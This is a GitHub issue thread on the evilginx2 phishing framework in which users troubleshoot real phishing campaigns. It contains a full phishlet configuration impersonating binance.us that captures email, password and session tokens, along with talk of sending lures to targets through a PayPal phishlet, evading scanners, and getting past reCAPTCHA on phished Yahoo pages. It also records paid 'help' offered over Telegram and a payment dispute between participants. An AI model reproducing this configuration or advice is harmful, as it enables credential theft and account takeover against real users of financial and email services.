search

kgretzky / evilginx2

Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
BSD 3-Clause "New" or "Revised" License
10.88k stars 1.96k forks source link

Binance phishlet CSS issues #708

Closed Evilginx2User closed 2 years ago

Evilginx2User commented 2 years ago

Hello Please why isn't evilginx2 fixing the CSS issues on my phishlet ??

Evilginx2User commented 2 years ago

IMG_20220116_103040.jpgIMG_20220116_102753.jpg

Evilginx2User commented 2 years ago

Those are what I keep getting while running the binance phishlet.

ssl-user-en commented 2 years ago

Hey i can help you fix it. Drop in your telegram.

Evilginx2User commented 2 years ago

@Lawson2_a1

Evilginx2User commented 2 years ago

I'll really appreciate I'll be waiting for your text.

SuperbSonik commented 2 years ago

I'll really appreciate I'll be waiting for your text.

be careful it might be a scam.

Evilginx2User commented 2 years ago

I'll really appreciate I'll be waiting for your text.

be careful it might be a scam.

Noted..thanks

Evilginx2User commented 2 years ago

Hey i can help you fix it. Drop in your telegram.

I'm still waiting for your text so do you have a solution or your just kidding ??

Evilginx2User commented 2 years ago

IMG_20220118_153739.jpg After clicking the binance phishing link this is what I get on evilginx2 I think the CSS design has something to do with the static sub domain and evilginx2 is finding it hard to connect with it.

Evilginx2User commented 2 years ago

i need the real yaml file. what you paste has some print missing

i need a direct copy from the repository

Ok I'll provide it

Evilginx2User commented 2 years ago

this happen to me while using yahoo yaml sometimes

GNU nano 5.4 author: '@Evil2' min_ver: '2.3.0' proxy_hosts:

  • {phish_sub: 'www', orig_sub: 'www', domain: 'binance.us', session: true, is_landing: true}
  • {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'binance.us', session: false, is_landing: false}
  • {phish_sub: 'preprod', orig_sub: 'preprod', domain: 'binance.us', session: false, is_landing: false}
  • {phish_sub: 'static', orig_sub: 'static', domain: 'binance.us', session: false, is_landing: false}
  • {phish_sub: 'stream', orig_sub: 'stream', domain: 'binance.us', session: false, is_landing: false}
  • {phish_sub: 'api', orig_sub: 'api', domain: 'binance.us', session: false, is_landing: false}
  • {phish_sub: 'support', orig_sub: 'support', domain: 'binance.us', session: false, is_landing: false}
  • {phish_sub: 'test', orig_sub: 'test', domain: 'binance.us', session: false, is_landing: false}
  • {phish_sub: 'docs', orig_sub: 'docs', domain: 'binance.us', session: false, is_landing: false}

  • {phish_sub: 'blog', orig_sub: 'blogs', domain: 'binance.us', session: false, is_landing: false} sub_filters:

    • {triggers_on: 'www.binance.us', orig_sub: 'www', domain: 'binance.us', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']}
    • {triggers_on: 'preprod.binance.us', orig_sub: 'preprod', domain: 'binance.us', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
    • {triggers_on: 'static.binance.us', orig_sub: 'static', domain: 'binance.us', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
    • {triggers_on: 'stream.binance.us', orig_sub: 'stream', domain: 'binance.us', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
    • {triggers_on: 'api.binance.us', orig_sub: 'api', domain: 'binance.us', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
    • {triggers_on: 'support.binance.us', orig_sub: 'support', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
    • {triggers_on: 'accounts.binance.us', orig_sub: 'accounts', domain: 'binance.us', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
    • {triggers_on: 'test.binance.us', orig_sub: 'test', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
    • {triggers_on: 'docs.binance.us', orig_sub: 'docs', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}

  • {triggers_on: 'blog.binance.us', orig_sub: 'blog', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} auth_tokens:

    • domain: '.binance.us' keys: [".,regexp"] credentials: username: key: 'email' search: '(.)' type: 'post' password: key: 'password' search: '(.*)' type: 'post' auth_urls:
    • '/mail'
    • '/mail/' login: domain: 'accounts.binance.us' path: '/en/login?return_to=aHR0cHM6Ly93d3cuYmluYW5jZS51cy9lbi9ob21l'

this happen to me while using yahoo yaml sometimes. what you have to do is great a new vps and domain name then try again. also at * domain: '.binance.us'

keys: ["._,regexp"] add  or replace binance.us with accounts.binance.us

Did yours finally work out after getting a new domain and vps ??

Evilginx2User commented 2 years ago

this happen to me while using yahoo yaml sometimes

GNU nano 5.4 author: '@Evil2' min_ver: '2.3.0' proxy_hosts:

  • {phish_sub: 'www', orig_sub: 'www', domain: 'binance.us', session: true, is_landing: true}
  • {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'binance.us', session: false, is_landing: false}
  • {phish_sub: 'preprod', orig_sub: 'preprod', domain: 'binance.us', session: false, is_landing: false}
  • {phish_sub: 'static', orig_sub: 'static', domain: 'binance.us', session: false, is_landing: false}
  • {phish_sub: 'stream', orig_sub: 'stream', domain: 'binance.us', session: false, is_landing: false}
  • {phish_sub: 'api', orig_sub: 'api', domain: 'binance.us', session: false, is_landing: false}
  • {phish_sub: 'support', orig_sub: 'support', domain: 'binance.us', session: false, is_landing: false}
  • {phish_sub: 'test', orig_sub: 'test', domain: 'binance.us', session: false, is_landing: false}
  • {phish_sub: 'docs', orig_sub: 'docs', domain: 'binance.us', session: false, is_landing: false}

  • {phish_sub: 'blog', orig_sub: 'blogs', domain: 'binance.us', session: false, is_landing: false} sub_filters:

    • {triggers_on: 'www.binance.us', orig_sub: 'www', domain: 'binance.us', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']}
    • {triggers_on: 'preprod.binance.us', orig_sub: 'preprod', domain: 'binance.us', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
    • {triggers_on: 'static.binance.us', orig_sub: 'static', domain: 'binance.us', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
    • {triggers_on: 'stream.binance.us', orig_sub: 'stream', domain: 'binance.us', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
    • {triggers_on: 'api.binance.us', orig_sub: 'api', domain: 'binance.us', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
    • {triggers_on: 'support.binance.us', orig_sub: 'support', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
    • {triggers_on: 'accounts.binance.us', orig_sub: 'accounts', domain: 'binance.us', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
    • {triggers_on: 'test.binance.us', orig_sub: 'test', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
    • {triggers_on: 'docs.binance.us', orig_sub: 'docs', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}

  • {triggers_on: 'blog.binance.us', orig_sub: 'blog', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} auth_tokens:

    • domain: '.binance.us' keys: [".,regexp"] credentials: username: key: 'email' search: '(.)' type: 'post' password: key: 'password' search: '(.*)' type: 'post' auth_urls:
    • '/mail'
    • '/mail/' login: domain: 'accounts.binance.us' path: '/en/login?return_to=aHR0cHM6Ly93d3cuYmluYW5jZS51cy9lbi9ob21l'

this happen to me while using yahoo yaml sometimes. what you have to do is great a new vps and domain name then try again. also at * domain: '.binance.us'

keys: ["._,regexp"] add  or replace binance.us with accounts.binance.us

IMG_20220118_182928.jpg

I just changed my domain and it worked but I got that error while using it does it make use of json token or what ?? Why that error..

marcustansoon commented 2 years ago

Seems like the Google reCaptcha is tied to same domain site only. If you are to access it from a different domain, this might trigger the error. Its the reCAPTCHA security settings

Evilginx2User commented 2 years ago

Seems like the Google reCaptcha is tied to same domain site only. If you are to access it from a different domain, this might trigger the error. Its the reCAPTCHA security settings

So do you have an Idea how I can disable it ??

Evilginx2User commented 2 years ago

How did you bypass the rcaptcha security on Yahoo ??

LexKingz commented 2 years ago

hey guys please i have an issue with my lures url....any time i send the lure url to target...and i click on the url, it would load the page for just one second and immediately redirect to "about:blank" page.....I tried so many times and still the same thing.....please what do i do...i am using paypal phishlet

LexKingz commented 2 years ago

i feel like there are scanners somewhere in between that detects my phishlets and deletes it....i am really confused on that one anyways...please i need help

ghost commented 2 years ago

How did you bypass the rcaptcha security on Yahoo ??

All ReCaptcha does is compare the phishing page domain to the real one. Not difficult to solve at all

Jillsarkozi50 commented 2 years ago

How to solve Recaptcha issue?

Jillsarkozi50 commented 2 years ago

Hey i can help you fix it. Drop in your telegram.

Please,I'm facing same issue can you help me out too

freewishes10 commented 2 years ago

Hey i can help you fix it. Drop in your telegram.

Please,I'm facing same issue can you help me out too

if you can drop some coin, ill help you, write me @teddykz

Jillsarkozi50 commented 2 years ago

All guys who claimed to solve recaptcha bypass failed and It baffles me if no one can really solve it.

ghost commented 2 years ago

All guys who claimed to solve recaptcha bypass failed and It baffles me if no one can really solve it.

does my site work?

edit: took it offline in march, can't share it anymore

Just my two cents: I wouldn't get in contact with anyone from here who's deliberately offering to help you out, much less so when they're the one pushing.

Evilginx2User commented 2 years ago

All guys who claimed to solve recaptcha bypass failed and It baffles me if no one can really solve it.

I did on your CVC wallet and you thought you couldn run away with my remaining balance now your stranded and say all guys ...next time don't be faster than your shadow....make sure you learn well before tryna pull a staunt...it's been more than a week and now your stranded.. Apologize to me and I'll complete everything simple.....

Jillsarkozi50 commented 2 years ago

All guys who claimed to solve recaptcha bypass failed and It baffles me if no one can really solve it.

I did on your CVC wallet and you thought you couldn run away with my remaining balance now your stranded and say all guys ...next time don't be faster than your shadow....make sure you learn well before tryna pull a staunt...it's been more than a week and now your stranded.. Apologize to me and I'll complete everything simple.....

You are a retard scammer who taught I will fall for send money quick trick. Firstly you make this post which we are replying to on the 16th of Jan. thinking it was CSS because you don't know about Recaptcha even.Someone here helped you but the reality is recaptcha generate at every login or when you refresh the login page new code authomatically come.The one you are able to bypass work with single login.As soon as you refresh or post same link on another browser comes new Recaptcha with new code again.Here's where the trick begin, he would force you to make sure he gets all the money from you before he finish the lecture so you don't realize this is what happens.But with your constant money,money,money reciting like poem I knew you got something to hide.Remember you were even telling me you advice kgretzky and other guys that supported this evilginx2.And through your ways of working it's clear you just came across evilginx2.I will upload video to support my claims,I know you will open different username to praise yourself like you know what you are doing.You confessed to me when I insisted to make the bypass permanent that you are about to learn that.And I told you when you do I will balance you.You expect me to pay full money for a quater knowledge?Also if you dispute what I said then maybe I will just upload the lecture video here so you won't scamm anyone again with that your quarter not even half knowledge demanding full money bullshit. How can you become an expert when you actually initiated the same question not up to six weeks yet, I know some will still fall for your tricks but that's their problem not mine.

Jillsarkozi50 commented 2 years ago

All guys who claimed to solve recaptcha bypass failed and It baffles me if no one can really solve it.

does my site work?

~netlogin.myw4ll37.com/yahoo~ (edit: didn't enable antibot, site's borken now)

Just my two cents: I wouldn't get in contact with anyone from here who's deliberately offering to help you out, much less so when they're the one pushing.

This is what the main guy(Evilginx2User who originally asked this question does he turned expert overnight trying to scam people meanwhile he's doing bullshit

Evilginx2User commented 2 years ago

All guys who claimed to solve recaptcha bypass failed and It baffles me if no one can really solve it.

I did on your CVC wallet and you thought you couldn run away with my remaining balance now your stranded and say all guys ...next time don't be faster than your shadow....make sure you learn well before tryna pull a staunt...it's been more than a week and now your stranded.. Apologize to me and I'll complete everything simple.....

You are a retard scammer who taught I will fall for send money quick trick. Firstly you make this post which we are replying to on the 16th of Jan. thinking it was CSS because you don't know about Recaptcha even.Someone here helped you but the reality is recaptcha generate at every login or when you refresh the login page new code authomatically come.The one you are able to bypass work with single login.As soon as you refresh or post same link on another browser comes new Recaptcha with new code again.Here's where the trick begin, he would force you to make sure he gets all the money from you before he finish the lecture so you don't realize this is what happens.But with your constant money,money,money reciting like poem I knew you got something to hide.Remember you were even telling me you advice kgretzky and other guys that supported this evilginx2.And through your ways of working it's clear you just came across evilginx2.I will upload video to support my claims,I know you will open different username to praise yourself like you know what you are doing.You confessed to me when I insisted to make the bypass permanent that you are about to learn that.And I told you when you do I will balance you.You expect me to pay full money for a quater knowledge?Also if you dispute what I said then maybe I will just upload the lecture video here so you won't scamm anyone again with that your quarter not even half knowledge demanding full money bullshit. How can you become an expert when you actually initiated the same question not up to six weeks yet, I know some will still fall for your tricks but that's their problem not mine.

You know fully well I'm not a scammer and I don't appreciate what your doing if you decide to upload the bypass video it only makes you a little boy tryna offend me....

But I won't be offended because firstly I didn't scam you and I know that for sure you also know that if I scammed you why wait till now to make it public on GitHub it's been over 2 weeks you tried to pull that staunt on me why didn't you come here to make it public I really don't care what you do with what I thought you just make sure when next you tryna learn something you learn well because I don't appreciate folks like you.

You derive joy in tryna spoil people's name but I can assure you my good work will always speak for its self and I don't change my username it's always been what it is and I wouldn't change it for you or anybody else because I know I'm legit and I wouldn't scam anyone.... Whatever you say doesn't affect me any bit... Your just mad at yourself for being dumb people like you don't really accomplish anything because your full of yourself.

I'll stand my ground here and in the future and for those who doesn't know what my telegram username is here it is @Lawson2_a1 if I ever ask you for money before doing anything for you block me ...and if you want to really confirm this guy is a silly young boy who's just offended because his knowledge is limited by the few things he Knows.

I boldly say to the open public bring in the challenge and to avoid future embarrassment and insult I'll from today not be doing any paid or free jobs from GitHub..... But please to satisfy your curiosity I'll really like someone whose bold enough to speak the truth to give me something to do put me to the test if I do you'll come out here to say it out.... But note I won't be teaching you how to do it...

For those who believe someone can't become an expert in a limited time it takes Complete devotion to solve all this ....I'm so surprised that even with all you claimed to have as a security tool you still couldn't figure it out and you claim to have been In the business for a while.

Hey little boy post the video but I also want you to know what happens when the method for rcaptcha bypass is all out ... remember the creator of Evilginx2 said he won't be dropping proof of code because of what it can be used for... If your a smart boy you'll know all this but instead you've decided to put your frustration on someone else...

I really don't care what you do from here on and I'm not interested in what you refused paying me..

I just want you to keep learning it will be helpful and most of all don't let pride get the best of you.... It hasn't helped anyone I know off... I'm pretty sure it won't help you too.

Have a nice day pal for you've sounded unreasonable and unthoughtful...

Jillsarkozi50 commented 2 years ago

All guys who claimed to solve recaptcha bypass failed and It baffles me if no one can really solve it.

I did on your CVC wallet and you thought you couldn run away with my remaining balance now your stranded and say all guys ...next time don't be faster than your shadow....make sure you learn well before tryna pull a staunt...it's been more than a week and now your stranded.. Apologize to me and I'll complete everything simple.....

You are a retard scammer who taught I will fall for send money quick trick. Firstly you make this post which we are replying to on the 16th of Jan. thinking it was CSS because you don't know about Recaptcha even.Someone here helped you but the reality is recaptcha generate at every login or when you refresh the login page new code authomatically come.The one you are able to bypass work with single login.As soon as you refresh or post same link on another browser comes new Recaptcha with new code again.Here's where the trick begin, he would force you to make sure he gets all the money from you before he finish the lecture so you don't realize this is what happens.But with your constant money,money,money reciting like poem I knew you got something to hide.Remember you were even telling me you advice kgretzky and other guys that supported this evilginx2.And through your ways of working it's clear you just came across evilginx2.I will upload video to support my claims,I know you will open different username to praise yourself like you know what you are doing.You confessed to me when I insisted to make the bypass permanent that you are about to learn that.And I told you when you do I will balance you.You expect me to pay full money for a quater knowledge?Also if you dispute what I said then maybe I will just upload the lecture video here so you won't scamm anyone again with that your quarter not even half knowledge demanding full money bullshit. How can you become an expert when you actually initiated the same question not up to six weeks yet, I know some will still fall for your tricks but that's their problem not mine.

You know fully well I'm not a scammer and I don't appreciate what your doing if you decide to upload the bypass video it only makes you a little boy tryna offend me....

But I won't be offended because firstly I didn't scam you and I know that for sure you also know that if I scammed you why wait till now to make it public on GitHub it's been over 2 weeks you tried to pull that staunt on me why didn't you come here to make it public I really don't care what you do with what I thought you just make sure when next you tryna learn something you learn well because I don't appreciate folks like you.

You derive joy in tryna spoil people's name but I can assure you my good work will always speak for its self and I don't change my username it's always been what it is and I wouldn't change it for you or anybody else because I know I'm legit and I wouldn't scam anyone.... Whatever you say doesn't affect me any bit... Your just mad at yourself for being dumb people like you don't really accomplish anything because your full of yourself.

I'll stand my ground here and in the future and for those who doesn't know what my telegram username is here it is @Lawson2_a1 if I ever ask you for money before doing anything for you block me ...and if you want to really confirm this guy is a silly young boy who's just offended because his knowledge is limited by the few things he Knows.

I boldly say to the open public bring in the challenge and to avoid future embarrassment and insult I'll from today not be doing any paid or free jobs from GitHub..... But please to satisfy your curiosity I'll really like someone whose bold enough to speak the truth to give me something to do put me to the test if I do you'll come out here to say it out.... But note I won't be teaching you how to do it...

For those who believe someone can't become an expert in a limited time it takes Complete devotion to solve all this ....I'm so surprised that even with all you claimed to have as a security tool you still couldn't figure it out and you claim to have been In the business for a while.

Hey little boy post the video but I also want you to know what happens when the method for rcaptcha bypass is all out ... remember the creator of Evilginx2 said he won't be dropping proof of code because of what it can be used for... If your a smart boy you'll know all this but instead you've decided to put your frustration on someone else...

I really don't care what you do from here on and I'm not interested in what you refused paying me..

I just want you to keep learning it will be helpful and most of all don't let pride get the best of you.... It hasn't helped anyone I know off... I'm pretty sure it won't help you too.

Have a nice day pal for you've sounded unreasonable and unthoughtful...

Anyway,I never wanted to actually talked about it but when I came here asking if anyone could make the bypass permanent instead of mute you started accusing me of running away with your balance.I just said what you are able to do but what's the point if the bypass won't work after a single click another code automatically regenerate.That's nothing special or hard to know about what you did.Your problem is you are elevating your ability on this to the sky which to me is bullshit.If you are sure to do permanent bypass I'm dropping rest of your money Immediately.To come here and make me look like a fool or retard which is basically the techniques of scammer that's why I had to let people know your limitations too.And remember immediately you had to delete all our telegram conversations so I won't have prove to show where you basically confessed you couldn't make the bypass permanent and you are learning to do it also.What's the big deal about not knowing how to do something since you actually made the initial post asking people to help you out here.If you are all knowing as you claimed how come you came here for help? I wouldn't even thought of uploading it here but as you are now calling me a retard I would also want others to see who basically was lying and how within 2 weeks of understanding temporary bypass you turned to a burg bounty hunter helping cryptocurrency sites for 0-day exploit as you claimed in our conversations.What you showed me I already grasp that I know I can bypass temporarily which is what you could do,but coming here to say otherwise is what got me angry. Now,I'm making offer you can't resist: I will tripple your balance do it to make it permanent if you can if not don't reply here and raising yourself to the sky again. Bye

penetrattt commented 2 years ago

kids

Evilginx2User commented 2 years ago

kids

Adult!